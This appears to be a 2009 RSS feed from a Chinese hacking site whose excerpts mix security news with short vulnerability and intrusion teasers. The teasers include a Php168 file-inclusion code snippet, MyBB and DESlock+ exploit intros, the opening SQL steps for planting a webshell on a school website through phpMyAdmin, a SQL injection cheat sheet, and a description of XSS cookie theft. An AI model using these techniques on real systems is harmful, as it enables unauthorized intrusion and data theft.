			<title>赛门铁克安全公告：迈克尔.杰克逊去世引发新一轮垃圾邮件狂潮</title>
			<author>Akira</author>
			<description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 赛门铁克近日监测到假冒CNN报道杰克逊去世新闻的垃圾邮件，并发现其中包含了恶意链接。如果用户出于好奇心点击该链接，便被重新定向到一个恶意网页。</p><br /><br /><a href="http://www.hackclub.net/show-89-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-89-1.html</link>
			<category domain="http://www.hackclub.net/category-4-1.html">业界资讯</category>
			<pubDate>2009-06-30 19:55</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-88-1.html</guid>
			<title>Php168 本地文件包含漏洞</title>
			<author>Akira</author>
			<description><![CDATA[<p>影响版本: <br />
v6版<br />
漏洞描述:<br />
在do/job.php文件:<br />
<br />
...<br />
}elseif(ereg(&quot;^([-_0-9a-zA-Z]+)$&quot;,$_GET[job])||ereg(&quot;^([-_0-9a-zA-Z]+)$&quot;,$_POST[job])){ <br />
&nbsp;&nbsp;&nbsp; require(dirname(__FILE__).&quot;/&quot;.&quot;global.php&quot;); <br />
&nbsp;&nbsp;&nbsp; if(is_file(PHP168_PATH.&quot;inc/job/$job.php&quot;)){ <br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; include(PHP168_PATH.&quot;inc/job/$job.php&quot;); <br />
&nbsp;&nbsp;&nbsp; } <br />
}</p><br /><br /><a href="http://www.hackclub.net/show-88-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-88-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-06-25 15:33</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-86-1.html</guid>
			<title>MyBB &lt;= 1.4.6 Remote Code Execution Exploit</title>
			<author>Akira</author>
			<description><![CDATA[<p>Someone decided to contact mybb's staff informing about this vulnerability with the obvious result that this will not work anymore. <br />
Fucking moron.<br />
<br />
I'm releasing a non-finished version of the exploit. No help, PoC and with the necessity of --admindir flag.<br />
Going to update it in the next days.<br />
For historical reason, i'm leaving the original title, but note that is &lt;= 1.4.6</p><br /><br /><a href="http://www.hackclub.net/show-86-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-86-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-06-23 11:36</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-84-1.html</guid>
			<title>DESlock+ 4.0.2 dlpcrypt.sys Local Kernel ring0 Code Execution Exploit</title>
			<author>Akira</author>
			<description><![CDATA[<p>/* deslock-dlpcrypt.c<br />
&nbsp;*<br />
&nbsp;* Copyright (c) 2009 by &lt;mu-b@digit-labs.org&gt;<br />
&nbsp;*<br />
&nbsp;* DESlock+ 4.0.2 local kernel SYSTEM exploit<br />
&nbsp;* by mu-b - Thu 18 Jun 2009<br />
&nbsp;*<br />
&nbsp;* - Tested on: dlpcrypt.sys 0.1.1.27<br />
&nbsp;*<br />
&nbsp;* .text:0001BB2E: 'what do ya want for nothing?'<br />
&nbsp;*&nbsp; - hmmm, something that doesn't pass kernel mode pointers<br />
&nbsp;*&nbsp;&nbsp;&nbsp; between kernel and userland?<br />
&nbsp;*<br />
&nbsp;* Compile: MinGW + -lntdll<br />
&nbsp;*<br />
&nbsp;*&nbsp;&nbsp;&nbsp; - Private Source Code -DO NOT DISTRIBUTE -<br />
&nbsp;* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!</p><br /><br /><a href="http://www.hackclub.net/show-84-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-84-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-06-19 17:33</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-83-1.html</guid>
			<title>WordPress Plugin Photoracer 1.0 (id) SQL Injection Vulnerability</title>
			<author>Akira</author>
			<description><![CDATA[<p>ordpress Photoracer Plugin =&gt; SQL injection<br />
http://wordpress.org/extend/plugins/photoracer/</p>
<p>Author: Kacper<br />
Website: http://devilteam.pl/</p>
<p>Pozdrawiam wszystkich z huba dc++, oraz wszystkich z forum, <br />
<br />
Pozdro: Ratman, Kopaczka, FDJ</p><br /><br /><a href="http://www.hackclub.net/show-83-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-83-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-06-18 20:44</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-82-1.html</guid>
			<title>存储过程的注入</title>
			<author>Akira</author>
			<description><![CDATA[<p>　由于存储过程中存在用于字符串连接的 + 号连接SQL语句,这就造成SQL注入的可能性</p><br /><br /><a href="http://www.hackclub.net/show-82-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-82-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-06-18 20:42</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-81-1.html</guid>
			<title>关于163XSS漏洞</title>
			<author>Akira</author>
			<description><![CDATA[<p>163 filter 08年底升级后,有不少改进.但还是明显落后于其它webmail.比如,除掉&lt;script&gt;,expression,eval.<br />
<br />
onerror变on_error,等.其实精心构造语句可以反利用filter过滤语句. 此法思路己有技术文章指出.在此暂且不论.<br />
<br />
163基于语法分析的filter还是不能很好地预期浏览器表现.</p><br /><br /><a href="http://www.hackclub.net/show-81-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-81-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-06-18 20:39</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-80-1.html</guid>
			<title>暴风新软件18日推出已关闭争议后台进程</title>
			<author>Akira</author>
			<description><![CDATA[<p>　　6月18日消息，昨天下午，暴风公司正式对外确认，该公司针对&ldquo;断网门&rdquo;事件特别定制的&ldquo;暴风门&rdquo;软件将于今天下午正式对外发布，其中，对于倍受业界质疑的stormliv自动运行进程，暴风公司明确表示将会关闭。 ...</p><br /><br /><a href="http://www.hackclub.net/show-80-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-80-1.html</link>
			<category domain="http://www.hackclub.net/category-4-1.html">业界资讯</category>
			<pubDate>2009-06-18 20:36</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-79-1.html</guid>
			<title>Finjan 报告一窥成熟的地下市场</title>
			<author>Akira</author>
			<description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Finjan在最新报告中指出黑客们已经拥有自己的eBay， 当前的黑客市场比以往任何时候都更加成熟。市场中政企肉鸡大量出现，市场的背景复杂，具备反打击手段。Funjan CTO Ben-Itzhak 告诉记者，黑客已经搭建了自己的 eBay 平台，满足各种需求。当自己的PC被他人当做财产买卖时，用户们可能依然浑然不知。</p><br /><br /><a href="http://www.hackclub.net/show-79-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-79-1.html</link>
			<category domain="http://www.hackclub.net/category-4-1.html">业界资讯</category>
			<pubDate>2009-06-18 20:32</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-78-1.html</guid>
			<title>苹果发布45个补丁修复iPhone漏洞</title>
			<author>Akira</author>
			<description><![CDATA[<p>昨天,苹果发布了45个补丁,修补iPhone和iPodTouch中存在的安全漏洞.这些补丁都包含在新推出的iPhone3.0系统中.同时发布如此多的补丁出人意料,不过苹果在设备安全上还是有着良好的声誉.自从2年前苹果进入移动市场后,分析师还未发现任何瞄准iPhone的病毒.华尔街的分析师表示,他们对此消息并不担心.</p><br /><br /><a href="http://www.hackclub.net/show-78-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-78-1.html</link>
			<category domain="http://www.hackclub.net/category-1-1.html">漏洞信息</category>
			<pubDate>2009-06-18 20:31</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-77-1.html</guid>
			<title>XSS之正向攻击</title>
			<author>Akira</author>
			<description><![CDATA[<p>　XSS正向攻击实现原理：<br />
访客访问被XSS的页面&mdash;&mdash;》XSS JS将客户端COOKIE+访客浏览器上的URL+访客IP发送到处理端－－》处理端接收到以上信息后，将封包发送到攻击端</p><br /><br /><a href="http://www.hackclub.net/show-77-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-77-1.html</link>
			<category domain="http://www.hackclub.net/category-10-1.html">技术文档</category>
			<pubDate>2009-06-18 20:27</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-76-1.html</guid>
			<title>phpMyAdmin一句话木马拿webshell</title>
			<author>Akira</author>
			<description><![CDATA[<p>某个学校网站的shell被管理员del了，只好重新弄。<br />
这次是利用phpMyAdmin<br />
登录后..<br />
首先：<br />
create database joyuan; /* 建立数据库joyuan */<br />
use joyuan; /* 连接joyuan数据库 */<br />
create table shell(code text); /* 建立表shell字段code文本型数据text */</p><br /><br /><a href="http://www.hackclub.net/show-76-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-76-1.html</link>
			<category domain="http://www.hackclub.net/category-11-1.html">入侵渗透</category>
			<pubDate>2009-06-18 20:23</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-75-1.html</guid>
			<title>Sql 注射总结大全</title>
			<author>Akira</author>
			<description><![CDATA[<p>&nbsp;Sql注射总结（早源于&rsquo;or&rsquo;1&rsquo;=&rsquo;1）<br />
最重要的表名：<br />
select * from sysobjects<br />
sysobjects ncsysobjects<br />
sysindexes tsysindexes<br />
syscolumns<br />
systypes<br />
sysusers<br />
sysdatabases<br />
sysxlogins<br />
sysprocesses<br />
最重要的一些用户名（默认sql数据库中存在着的）<br />
public<br />
dbo<br />
guest(一般禁止，或者没权限)<br />
db_sercurityadmin<br />
ab_dlladmin<br />
一些默认扩展<br />
xp_regaddmultistring<br />
xp_regdeletekey<br />
xp_regdeletevalue<br />
xp_regenumkeys<br />
xp_regenumvalues<br />
xp_regread<br />
xp_regremovemultistring<br />
xp_regwrite<br />
xp_availablemedia 驱动器相关<br />
xp_dirtree 目录<br />
xp_enumdsn ODBC连接<br />
xp_loginconfig 服务器安全模式信息<br />
xp_makecab 创建压缩卷<br />
xp_ntsec_enumdomains domain信息<br />
xp_terminate_process 终端进程，给出一个PID</p><br /><br /><a href="http://www.hackclub.net/show-75-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-75-1.html</link>
			<category domain="http://www.hackclub.net/category-11-1.html">入侵渗透</category>
			<pubDate>2009-06-18 20:22</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-74-1.html</guid>
			<title>黑客瞄准ATM取款机可一次提走所有现金</title>
			<author>Akira</author>
			<description><![CDATA[<p>　&nbsp; 安全厂商Trustwave日前表示，黑客最近又瞄上了银行的ATM取款机，通过在上面安装特定恶意软件，可以取光相关ATM机中的所有现金，并记录通过该ATM机取款的所有银行卡的账号和密码等敏感信息。</p><br /><br /><a href="http://www.hackclub.net/show-74-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-74-1.html</link>
			<category domain="http://www.hackclub.net/category-4-1.html">业界资讯</category>
			<pubDate>2009-06-18 20:09</pubDate>
		</item>
		<item>
			<guid>http://www.hackclub.net/show-73-1.html</guid>
			<title>MSSQL注入通杀，只要有注入点就有系统权限</title>
			<author>Akira</author>
			<description><![CDATA[<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在db_owner角色下添加SYSADMIN帐号，这招真狠啊，存在MSSQL注射漏洞的服务器又要遭殃了。方法主要是利用db_owner可以修改sp_addlogin和sp_addsrvrolemember这两个存储过程，饶过了验证部分。具体方法如下</p><br /><br /><a href="http://www.hackclub.net/show-73-1.html" target="_blank">阅读全文</a><br /><br />]]></description>
			<link>http://www.hackclub.net/show-73-1.html</link>
			<category domain="http://www.hackclub.net/category-11-1.html">入侵渗透</category>
			<pubDate>2009-06-18 20:02</pubDate>
		</item>
	</channel>
</rss>
